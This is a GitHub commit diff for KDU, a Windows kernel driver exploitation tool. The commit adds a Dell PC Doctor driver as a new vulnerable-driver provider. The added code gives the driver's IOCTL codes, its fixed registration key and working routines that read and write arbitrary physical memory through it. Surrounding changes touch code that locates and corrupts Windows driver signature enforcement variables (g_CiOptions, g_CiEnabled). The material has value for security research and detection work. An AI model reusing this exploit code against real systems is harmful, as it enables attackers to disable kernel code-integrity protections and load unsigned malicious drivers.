v 1.3.1

Added Dell PC Doctor driver as provider 33 Internal rearrange
JordanLinden · Apr 16, 2023 · 58b0cec · 58b0cec
1 parent a382dfe
commit 58b0cec
Show file tree

Hide file tree

Showing 62 changed files with 535 additions and 141 deletions.
diff --git a/KDU.sha256 b/KDU.sha256
diff --git a/README.md b/README.md
@@ -136,7 +136,8 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware
 | 29          | Arthur Liberman| ALSysIO64   | Core Temp                          | Original          | 2.0.11 and below            |                      |
 | 30          | AMD            | AMDRyzenMasterDriver  | Multiple software packages | Original          | 2.0.0.0 and below           |                      |
 | 31          | Hilscher       | physmem     | Physical Memory Viewer for Windows | Original          | 1.0.0.0                     |  Cert, Name          |
-| 32          | Lenovo         | LDD         | Lenovo Diagnostics Drivers for Windows 10 and later | Original          | 1.0.4.0                     |  Cert, Name          |
+| 32          | Lenovo         | LDD         | Lenovo Diagnostics Driver for Windows 10 and later | Original          | 1.0.4.0 and below               |  Cert, Name          |
+| 33          | Dell           | pcdsrvc_x64 | Dell PC Doctor                     | Original          | 6.2.2.0                     |                      |
 
 ###### *At commit time, data maybe inaccurate.
 

diff --git a/Source/Hamakaze/KDU.vcxproj.user b/Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@
 <?xml version="1.0" encoding="utf-8"?>
 <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
-    <LocalDebuggerCommandArguments>-dse 0</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-test</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
-    <LocalDebuggerCommandArguments>-prv 2 -map c:\install\dummy.sys</LocalDebuggerCommandArguments>
+    <LocalDebuggerCommandArguments>-test</LocalDebuggerCommandArguments>
     <DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
   </PropertyGroup>
 </Project>
diff --git a/Source/Hamakaze/drvmap.cpp b/Source/Hamakaze/drvmap.cpp
@@ -496,8 +496,10 @@ BOOL WINAPI KDUPagePatchCallback(
                     *(PULONG)&jmpcode[1],
                     Address + dispatchPageOffset);
 
+                targetAddress = Address + dispatchPageOffset;
+
                 bIoResult = WritePhysicalMemory(Params->DeviceHandle,
-                    Address + dispatchPageOffset,
+                    targetAddress,
                     jmpcode,
                     sizeof(jmpcode));
 

diff --git a/Source/Hamakaze/dsefix.cpp b/Source/Hamakaze/dsefix.cpp
@@ -6,7 +6,7 @@
 *
 *  VERSION:     1.31
 *
-*  DATE:        09 Apr 2023
+*  DATE:        14 Apr 2023
 *
 *  CI DSE corruption related routines.
 *  Based on DSEFix v1.3
@@ -310,15 +310,18 @@ ULONG_PTR KDUQueryCodeIntegrityVariableSymbol(
 {
     ULONG_PTR Result = 0, imageLoadedBase, kernelAddress = 0;
     LPWSTR lpModuleName;
+    LPCSTR lpSymbolName;
     HMODULE mappedImageBase;
 
     WCHAR szFullModuleName[MAX_PATH * 2];
 
     if (NtBuildNumber < NT_WIN8_RTM) {
         lpModuleName = (LPWSTR)NTOSKRNL_EXE;
+        lpSymbolName = (LPCSTR)"g_CiEnabled";
     }
     else {
         lpModuleName = (LPWSTR)CI_DLL;
+        lpSymbolName = (LPCSTR)"g_CiOptions";
     }
 
     if (symInit() == FALSE)
@@ -343,7 +346,7 @@ ULONG_PTR KDUQueryCodeIntegrityVariableSymbol(
 
         if (symLoadImageSymbols(lpModuleName, (PVOID)mappedImageBase, 0)) {
 
-            if (symLookupAddressBySymbol("g_CiOptions", &kernelAddress)) {
+            if (symLookupAddressBySymbol(lpSymbolName, &kernelAddress)) {
 
                 Result = (ULONG_PTR)imageLoadedBase + kernelAddress - (ULONG_PTR)mappedImageBase;
                 supPrintfEvent(kduEventInformation, "[+] Symbol resolved to 0x%llX address\r\n", Result);

diff --git a/Source/Hamakaze/idrv/dell.cpp b/Source/Hamakaze/idrv/dell.cpp
@@ -222,3 +222,144 @@ BOOL WINAPI DbUtilWriteVirtualMemory(
     SetLastError(dwError);
     return bResult;
 }
+
+/*
+* DpdReadPhysicalMemory
+*
+* Purpose:
+*
+* Read from physical memory.
+*
+*/
+BOOL WINAPI DpdReadPhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes)
+{
+    BOOL bResult = FALSE;
+    PVOID pvBuffer = NULL;
+
+    PCDCSRVC_READWRITE_REQUEST request;
+    SIZE_T size;
+
+    size = sizeof(PCDCSRVC_READWRITE_REQUEST) + NumberOfBytes;
+    pvBuffer = (PVOID)VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    if (pvBuffer) {
+
+        if (VirtualLock(pvBuffer, size)) {
+
+            request.PhysicalAddress.QuadPart = PhysicalAddress;
+            request.Size = NumberOfBytes;
+            request.Granularity = 0; //use direct memmove
+
+            bResult = supCallDriver(DeviceHandle,
+                IOCTL_PCDCSRVC_READPHYSMEM,
+                &request,
+                sizeof(PCDCSRVC_READWRITE_REQUEST),
+                pvBuffer,
+                NumberOfBytes);
+
+            if (bResult) {
+
+                RtlCopyMemory(Buffer,
+                    pvBuffer,
+                    NumberOfBytes);
+
+            }
+
+            VirtualUnlock(pvBuffer, size);
+        }
+
+        VirtualFree(pvBuffer, 0, MEM_RELEASE);
+
+    }
+
+    return bResult;
+}
+
+/*
+* DpdWritePhysicalMemory
+*
+* Purpose:
+*
+* Write to physical memory.
+*
+*/
+BOOL WINAPI DpdWritePhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes)
+{
+    BOOL bResult = FALSE;
+    PCDCSRVC_READWRITE_REQUEST* pRequest;
+    SIZE_T size;
+
+    size = sizeof(PCDCSRVC_READWRITE_REQUEST) + NumberOfBytes;
+    pRequest = (PCDCSRVC_READWRITE_REQUEST*)VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
+
+    if (pRequest) {
+
+        if (VirtualLock(pRequest, size)) {
+
+            pRequest->PhysicalAddress.QuadPart = PhysicalAddress;
+            pRequest->Granularity = 0; //use direct memmove
+            pRequest->Size = NumberOfBytes;
+
+            //
+            // Append data buffer to the tail.
+            //
+            RtlCopyMemory(
+                RtlOffsetToPointer(pRequest, sizeof(PCDCSRVC_READWRITE_REQUEST)),
+                Buffer,
+                NumberOfBytes);
+
+            bResult = supCallDriver(DeviceHandle,
+                IOCTL_PCDCSRVC_WRITEPHYSMEM,
+                pRequest,
+                (ULONG)size,
+                NULL,
+                0);
+
+            VirtualUnlock(pRequest, size);
+        }
+
+        VirtualFree(pRequest, 0, MEM_RELEASE);
+
+    }
+
+    return bResult;
+}
+
+/*
+* DellRegisterDriver
+*
+* Purpose:
+*
+* Dell drivers initialization routine.
+*
+*/
+BOOL WINAPI DellRegisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param)
+{
+    ULONG driverId = PtrToUlong(Param);
+    ULONG keyValue = 0xA1B2C3D4;
+
+    switch (driverId) {
+
+    case IDR_PCDSRVC:
+
+        return supCallDriver(DeviceHandle,
+            IOCTL_PCDCSRVC_REGISTER,
+            &keyValue,
+            sizeof(ULONG),
+            &keyValue,
+            sizeof(ULONG));
+
+    default:
+        return TRUE;
+    }
+}
diff --git a/Source/Hamakaze/idrv/dell.h b/Source/Hamakaze/idrv/dell.h
@@ -6,7 +6,7 @@
 *
 *  VERSION:     1.31
 *
-*  DATE:        08 Apr 2023
+*  DATE:        10 Apr 2023
 *
 *  Dell drivers interface header.
 *
@@ -28,27 +28,51 @@
 #define DBUTIL_FUNCTION_READVM  (DWORD)0x7B1
 #define DBUTIL_FUNCTION_WRITEVM (DWORD)0x7B2
 
-#define IOCTL_DBUTIL_READVM    \
+#define PCDCSRVC_FUNCTION_REGISTER (DWORD)0x801
+#define PCDCSRVC_FUNCTION_READPHYS (DWORD)0x821
+#define PCDCSRVC_FUNCTION_WRITEPHYS (DWORD)0x822
+
+#define IOCTL_DBUTIL_READVM     \
     CTL_CODE(DBUTIL_DEVICE_TYPE, DBUTIL_FUNCTION_READVM, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9B0C1EC4
 
 #define IOCTL_DBUTIL_WRITEVM    \
     CTL_CODE(DBUTIL_DEVICE_TYPE, DBUTIL_FUNCTION_WRITEVM, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x9B0C1EC8
 
+#define IOCTL_PCDCSRVC_REGISTER \
+    CTL_CODE(FILE_DEVICE_UNKNOWN, PCDCSRVC_FUNCTION_REGISTER, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x222004
+
+#define IOCTL_PCDCSRVC_READPHYSMEM  \
+    CTL_CODE(FILE_DEVICE_UNKNOWN, PCDCSRVC_FUNCTION_READPHYS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x222084
+
+#define IOCTL_PCDCSRVC_WRITEPHYSMEM \
+    CTL_CODE(FILE_DEVICE_UNKNOWN, PCDCSRVC_FUNCTION_WRITEPHYS, METHOD_BUFFERED, FILE_ANY_ACCESS) //0x222088
+
 //
 // Virtual memory read/write
 //
+// Size of data to read/write calculated as: 
+// InputBufferSize - sizeof packet header 0x18 bytes length
+//
 typedef struct _DBUTIL_READWRITE_REQUEST {
     ULONG_PTR Unused;
     ULONG_PTR VirtualAddress;
     ULONG_PTR Offset;
-    UCHAR Data[1];
+    UCHAR Data[ANYSIZE_ARRAY];
 } DBUTIL_READWRITE_REQUEST, * PDBUTIL_READWRITE_REQUEST;
 
 //
-// Size of data to read/write calculated as: 
-// 
-// InputBufferSize - sizeof packet header 0x18 bytes length
+// Physical memory read/write for DELL PC Doctor
 //
+// Sizeof 13 bytes.
+//
+#pragma pack(push, 1)
+typedef struct _PCDCSRVC_READWRITE_REQUEST {
+    PHYSICAL_ADDRESS PhysicalAddress;
+    ULONG Size;
+    BYTE Granularity;
+    // UCHAR Data[ANYSIZE_ARRAY]; //not a part of this structure
+} PCDCSRVC_READWRITE_REQUEST, *PPCDCSRVC_READWRITE_REQUEST;
+#pragma pack(pop)
 
 _Success_(return != FALSE)
 BOOL WINAPI DbUtilReadVirtualMemory(
@@ -69,3 +93,19 @@ BOOL DbUtilStartVulnerableDriver(
 
 VOID DbUtilStopVulnerableDriver(
     _In_ KDU_CONTEXT* Context);
+
+BOOL WINAPI DpdReadPhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI DpdWritePhysicalMemory(
+    _In_ HANDLE DeviceHandle,
+    _In_ ULONG_PTR PhysicalAddress,
+    _In_ PVOID Buffer,
+    _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI DellRegisterDriver(
+    _In_ HANDLE DeviceHandle,
+    _In_opt_ PVOID Param);
diff --git a/Source/Hamakaze/idrv/lenovo.h b/Source/Hamakaze/idrv/lenovo.h
@@ -47,7 +47,7 @@ typedef struct _LDD_WRITE_REQUEST {
 BOOL WINAPI LddReadWritePhysicalMemoryStub(
     _In_ HANDLE DeviceHandle,
     _In_ ULONG_PTR PhysicalAddress,
-    _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+    _In_ PVOID Buffer,
     _In_ ULONG NumberOfBytes);
 
 BOOL WINAPI LddRegisterDriver(

diff --git a/Source/Hamakaze/idrv/winio.cpp b/Source/Hamakaze/idrv/winio.cpp
@@ -737,7 +737,7 @@ BOOL WINAPI AsusIO3PreOpen(
     if (dllBuffer == NULL) {
 
         supPrintfEvent(kduEventError,
-            "[!] Requested data id cannot be found %lu\r\n", IDR_TAIGEI32);
+            "[!] Failed to load helper dll\r\n");
 
         return FALSE;
 
@@ -754,12 +754,14 @@ BOOL WINAPI AsusIO3PreOpen(
             szTemp,
             ASUS_LDR_DLL);
 
+        NTSTATUS ntStatus;
+
         if (supWriteBufferToFile(szFileName,
             dllBuffer,
             resourceSize,
             TRUE,
             FALSE,
-            NULL))
+            &ntStatus))
         {
             resourceSize = 0;
             svcBuffer = (PBYTE)KDULoadResource(IDR_DATA_ASUSCERTSERVICE,
@@ -798,10 +800,19 @@ BOOL WINAPI AsusIO3PreOpen(
 
                 supHeapFree(svcBuffer);
             }
+            else {
+                supPrintfEvent(kduEventError, "[!] Failed to load ASUS service resource\r\n");
+            }
 
         }
+        else {
+            supShowHardError("[!] Error while writing data to disk", ntStatus);
+        }
 
     }
+    else {
+        supPrintfEvent(kduEventError, "[!] Error while configuring helper dll\r\n");
+    }
 
     supHeapFree(dllBuffer);